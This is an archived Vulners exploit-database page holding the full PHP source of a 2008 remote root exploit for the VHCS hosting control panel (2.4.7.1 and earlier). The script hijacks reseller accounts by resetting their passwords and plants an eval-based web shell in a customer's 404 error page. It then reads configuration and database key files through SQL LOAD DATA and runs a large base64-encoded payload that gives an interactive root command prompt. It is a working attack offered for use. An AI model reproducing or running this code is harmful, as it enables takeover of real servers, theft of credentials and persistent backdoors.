Vulners
Lucene search
vhcs-root.txt
`#!/usr/bin/php -q
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
# VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
# --------------------------------------------------
#
# About:
# by DarkFig < gmdarkfig (at) gmail (dot) com >
# http://acid-root.new.fr/
# #[email protected]
#
# Exploit:
# + Logged in (Administrator)
# + The administrator has 2 resellers
# / Changing dareseller's password
# / Trying to connect as dareseller:thatpwnz
# + Login successful
# + The reseller has 2 users
# + Host domaintest.fr is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host domaintest.fr isn't a valid user
# + Host xpliamaclient.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host xpliamaclient.com isn't a valid user
# / Changing unautresel's password
# / Trying to connect as unautresel:thatpwnz
# + Login successful
# + The reseller has 1 users
# + Host thegoodone.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# / Trying to create a database
# + Database 92xpl_db39 successfully created
# + Using database id 12
# / Trying to add SQL user
# + User 93xpl_usr2 successfully created
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
# + Now you can execute commands as root =]
# + [email protected]: id
#
# uid=0(root) gid=0(root)
#
class vhcs_xpl extends phpsploit
{
var $sleep_time = 4;
# -rw-r--r-- 1 root root
var $conf_path = '/etc/vhcs2/vhcs2.conf';
# -r-------- 1 www-data www-data
var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';
var $head_arr = array(
'admin/index.php' => 3,
'reseller/index.php' => 2,
'../reseller/index.php' => 2,
'client/index.php' => 1,
'' => 0);
var $privileges = array(
3 => 'Administrator',
2 => 'Reseller',
1 => 'Client');
var $reg_arr = array(
1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
5 => '#sql_execute_query.php\?id=([0-9]+)#i');
var $flags = array(
-1 => '-',
0 => '/',
1 => '+');
function main()
{
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
if($this->proxh)
$this->proxy($this->proxh);
if($this->proxa)
$this->proxyauth($this->proxa);
print "\nExploit:";
$this->type = $this->login();
if(empty($this->type))
{
if(!$this->patch)
{
$this->msg('A patch has been applied to this website', -1);
$this->msg("See RoMaNSoFt's advisory for more details", -1);
$this->msg('Try with the -patch option', -1, 1);
}
else
$this->msg('Bad username/password', -1, 1);
}
$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);
$this->allowredirection(1);
$this->get_vhcs_conf();
$this->exec_cmd();
return;
}
function getparam($param, $nec=FALSE)
{
global $argv;
foreach($argv as $value => $key)
{
if($key === '-'.$param)
return $argv[$value+1];
}
if($nec)
$this->usage();
return FALSE;
}
function mhead()
{
print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
print "\n --------------------------------------------------\n";
print "\nAbout:";
print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
print "\n http://acid-root.new.fr/";
print "\n #[email protected]";
print "\n";
return;
}
function usage()
{
print "\nUsage:";
print "\n vhcsxpl.php -url <url> [options...]\n";
print "\nOptions:";
print "\n -patch <user:pwd> Unofficial patch applied";
print "\n -proxhost <ip> If you wanna use a proxy";
print "\n -proxauth <usr:pwd> Proxy with authentication\n";
print "\n";
exit(1);
}
function log_as()
{
$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0);
$this->allowredirection(1);
$this->post($this->uri.'chk_login.php',
'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');
$this->redir_type = $this->get_type_by_redir();
if($this->redir_type == 0)
$this->msg('Login attempt failed', -1);
else
$this->msg('Login successful', 1);
return $this->redir_type;
}
function get_type_by_redir()
{
$this->redir_arr = parse_url($this->last_redirection);
$this->allowredirection(0);
return $this->head_arr[$this->redir_arr['path']];
}
function login()
{
if($this->patch)
{
$this->idents = explode(':', $this->patch);
list($this->usr, $this->pwd) = $this->idents;
$this->type = $this->log_as();
return $this->log_as_user();
}
else
{
$this->get($this->uri.'admin/manage_users.php');
$this->type = 3;
if(ereg('add_user\.php', $this->getcontent()))
return $this->log_as_user();
else
return 0;
}
}
function log_as_user()
{
if($this->type == 3)
$this->logged_as_admin();
if($this->type == 2)
$this->logged_as_reseller();
if($this->type == 1)
{
if(!$this->patch)
return 1;
else
return $this->valid_user();
}
else
return 0;
}
function valid_user()
{
if($this->write_code())
{
# open_basedir + safe_mode
if($this->is_safe())
{
if($this->bypass_with_db())
return 1;
else
return 0;
}
else
return 1;
}
return 0;
}
function logged_as_admin()
{
$this->msg('Logged in ('.$this->privileges[3].')', 1);
$this->get($this->uri.'admin/manage_users.php');
preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);
$this->reseller_count = count($resellers[1]);
$this->msg('The administrator has '.$this->reseller_count.' resellers', 1);
for($i=0; $i<$this->reseller_count; $i++)
{
$this->usr = $resellers[2][$i];
$this->pwd = 'thatpwnz';
if(!$this->patch)
{
$this->msg('Changing '.$resellers[2][$i]."'s password", 0);
$this->reseller_dat = '';
$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);
# only checked ip
preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
$this->getcontent(), $reseller_ips);
$this->ip_count = count($reseller_ips[1]);
$this->ip_dat = '';
for($j=0; $j<$this->ip_count; $j++)
{
$this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';
if($j != $this->ip_count-1)
$this->ip_dat .= '&';
}
# Change reseller's password/mail
# This is needed if it was run without -path
# Because we can't click on the 'Change' button.
#
# pwd: thatpwnz
# mail: <reseller_name>@ohyeah.com
#
$this->post($this->uri.'admin/edit_reseller.php',
'username='.$resellers[2][$i].'&pass=thatpwnz&'.
'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
'eller_max_subdomain_cnt=0&nreseller_max_alias'.
'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
'ate++&uaction=update_reseller&edit_id='.
$resellers[1][$i].'&edit_username='.
$resellers[2][$i]);
if($this->log_as() != 2)
return 0;
}
else
{
$this->allowredirection(1);
$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);
if($this->get_type_by_redir() != 2)
return 0;
}
if($this->logged_as_reseller())
return 1;
$this->reset('cookie');
$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
}
return 0;
}
function logged_as_reseller()
{
$this->get($this->uri.'reseller/users.php');
preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
array_walk($users[2], 'trim');
$this->user_count = count($users[1]);
$this->msg('The reseller has '.$this->user_count. ' users', 1);
$this->patch = FALSE;
for($i=0; $i<$this->user_count; $i++)
{
if($this->is_alive($users[2][$i]))
{
$this->usr = $users[2][$i];
$this->type = 1;
$this->msg('Host '.$this->usr.' is connected', 1);
$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);
if($this->valid_user())
{
$this->msg('Host '.$this->usr.' is a valid user', 1);
return TRUE;
}
else
$this->msg("Host ".$this->usr." isn't a valid user", 0);
}
else
$this->msg('Host '.$users[2][$i].' seems down', -1);
$this->get($this->uri.'client/change_user_interface.php?action=go_back');
}
return FALSE;
}
function bypass_with_db()
{
$this->get($this->dmn_vhcs_url.'client/index.php');
if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
{
$this->msg("User ".$this->ur." doesn't have SQL rights", -1);
return FALSE;
}
# No database
if(!$this->got_db())
{
$this->msg('Trying to create a database', 0);
$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);
# Database: ..xpl_db..
$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
'uaction=add_db');
if($this->got_db())
$this->msg('Database '.$this->tmp_db_name.' successfully created', 1);
else
{
$this->msg("Can't create the database ".$this->tmp_db_name, 0);
return FALSE;
}
}
# First database
$this->db_id = $this->sql_db_ids[1];
$this->msg('Using database id '.$this->db_id, 1);
if(!$this->got_db_user())
{
$this->msg('Trying to add SQL user', 0);
$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
# SQL user: ..xpl_usr..:xpl_pwd
$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
$this->db_id);
if($this->got_db_user())
$this->msg('User '.$this->tmp_db_user.' successfully created', 1);
else
{
$this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);
return FALSE;
}
}
# First SQL user id associed with the database
$this->db_user_id = $this->sql_usrs[1];
$this->msg('Using SQL user id '.$this->db_user_id, 1);
return TRUE;
}
function got_db_user()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
$this->content_arr = explode("\n", $this->getcontent());
$this->is_sql_db_usr = FALSE;
for($i=0; $i<count($this->content_arr); $i++)
{
if(preg_match($this->reg_arr[4],
$this->content_arr[$i], $this->sql_db_id))
{
if($this->sql_db_id[1] == $this->db_id)
$this->is_sql_db_usr = TRUE;
else
$this->is_sql_db_usr = FALSE;
}
if(preg_match($this->reg_arr[5],
$this->content_arr[$i], $this->sql_usrs))
{
if($this->is_sql_db_usr)
return TRUE;
}
}
return FALSE;
}
function got_db()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
preg_match($this->reg_arr[3],
$this->getcontent(), $this->sql_db_ids);
if(empty($this->sql_db_ids))
return FALSE;
else
return TRUE;
}
function is_alive($domain_name)
{
if(gethostbyname($domain_name) != $domain_name)
return TRUE;
else
return FALSE;
}
function write_code()
{
$this->msg('Trying to write PHP code', 0);
$this->dmn_url = 'http://'.$this->usr;
$this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];
$this->get($this->dmn_url.'/errors/404/index.php');
$this->old_404 = $this->getcontent();
$this->phpc =
'<?php '
.'error_reporting(0); '
.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
.'?>';
$this->new_404 = $this->phpc.$this->old_404;
$this->post($this->dmn_vhcs_url.'client/error_pages.php',
'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');
$this->exec_php('print "itworkz";');
if(ereg('itworkz', $this->getcontent()))
{
$this->msg('PHP code successfully written', 1);
return TRUE;
}
else
{
$this->msg("Can't write PHP code", -1);
return FALSE;
}
}
function get_vhcs_conf()
{
if($this->safe_mode)
$this->msg('Trying to load files via local_infile', 0);
else
$this->msg('Trying to load files via shell_exec', 0);
$this->lf_conf = $this->path_content($this->conf_path);
$this->lf_conf = trim($this->lf_conf, "\r");
$this->vhcs_conf = explode("\n", $this->lf_conf);
$this->conf = array();
foreach($this->vhcs_conf as $this->conf_line)
{
# comment
if(!ereg('^(\s*)#', $this->conf_line))
{
$this->pos = strpos($this->conf_line, '=');
$this->name = strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
$this->value = trim(substr($this->conf_line, $this->pos+1));
$this->conf[$this->name] = $this->value;
}
}
$this->php_keys_code = $this->path_content($this->keys_path);
return;
}
function path_content($path)
{
# open_basedir On/off
# safe_mode = Off
if(!$this->safe_mode)
{
$this->phpc = 'print shell_exec("cat '.$path.'");';
$this->exec_php($this->phpc);
$this->file_content = $this->getcontent();
}
# open_basedir On/Off
# safe_mode = On
else
{
$this->rand_table = rand().'tmp_hax'.rand();
$this->sql_query =
"CREATE TABLE ".$this->rand_table." (content text not null); ".
"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
$this->rand_table;
$this->sql_arr = explode(';', $this->sql_query);
$this->sql_cnt = count($this->sql_arr);
for($i=0; $i<$this->sql_cnt; $i++)
{
$this->sql_res = $this->exec_sql($this->sql_arr[$i]);
if($i == $this->sql_cnt-2)
$this->file_content = $this->sql_res;
}
}
if(!$this->file_content)
{
$this->msg("A problem occurred while trying to read the file $path", -1);
if($this->safe_mode)
$this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);
else
$this->msg("We don't have sufficient access rights to the file", -1, -2);
}
else
$this->msg("Ok: $path", 1);
return $this->file_content;
}
function exec_sql($query)
{
$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
'cute_query&id='.$this->db_user_id);
$this->sql_result = '';
if(ereg('PWNEDCONTENT', $this->getcontent()))
{
$this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());
$this->sql_result = pack('H*', $this->sql_res_arr[1]);
}
return $this->sql_result;
}
function is_safe()
{
$this->phpc =
'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
.'or !function_exists("shell_exec")) '
.'{ print "safe_mode=on"; }';
$this->exec_php($this->phpc);
# open_basedir always set
if(ereg('safe_mode=on', $this->getcontent()))
{
$this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);
$this->safe_mode = TRUE;
}
else
{
$this->msg('PHP configured with default safe_mode value (Off)', 0);
$this->safe_mode = FALSE;
}
return $this->safe_mode;
}
function exec_cmd()
{
$this->msg("Now you can execute commands as root =]", 1);
$this->woot_code =
'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
.'RsaW5lOw0KfQo/Pgo=';
while($this->cmd_prompt())
{
$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
$this->tmp_file = $this->getcontent().'/'.md5(rand());
$this->set_hvar('db-host', $this->conf['DATABASE_HOST']);
$this->set_hvar('db-user', $this->conf['DATABASE_USER']);
$this->set_hvar('db-pass', $this->conf['DATABASE_PASSWORD']);
$this->set_hvar('db-name', $this->conf['DATABASE_NAME']);
$this->set_hvar('sleep-time', $this->sleep_time);
$this->set_hvar('file', $this->tmp_file);
$this->set_hvar('cmd', $this->cmd);
$this->set_hvar('version', $this->conf['Version']);
$this->set_hvar('php-keys', '?>'.$this->php_keys_code);
$this->exec_php('?>'.base64_decode($this->woot_code));
print "\n".$this->getcontent();
}
exit(0);
}
function set_hvar($name, $value)
{
$this->addheader('Sploit-'.$name, base64_encode($value));
return;
}
function cmd_prompt()
{
$this->msg('root@'.$this->usr.': ', 1);
$this->cmd = trim(fgets(STDIN));
if(!ereg('^(quit|exit)$', $this->cmd))
return TRUE;
else
return FALSE;
}
function exec_php($php)
{
$this->addheader('Shell', base64_encode($php));
$this->get($this->dmn_url.'/errors/404/index.php');
return;
}
function msg($msg, $flag, $action=0)
{
print "\n ".$this->flags[$flag]."\x20".$msg;
switch($action)
{
case 1:
print "\n";
return $this->usage();
break;
case 2:
print "\n";
exit(1);
break;
}
}
}
$spl = new vhcs_xpl;
$spl->main();
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4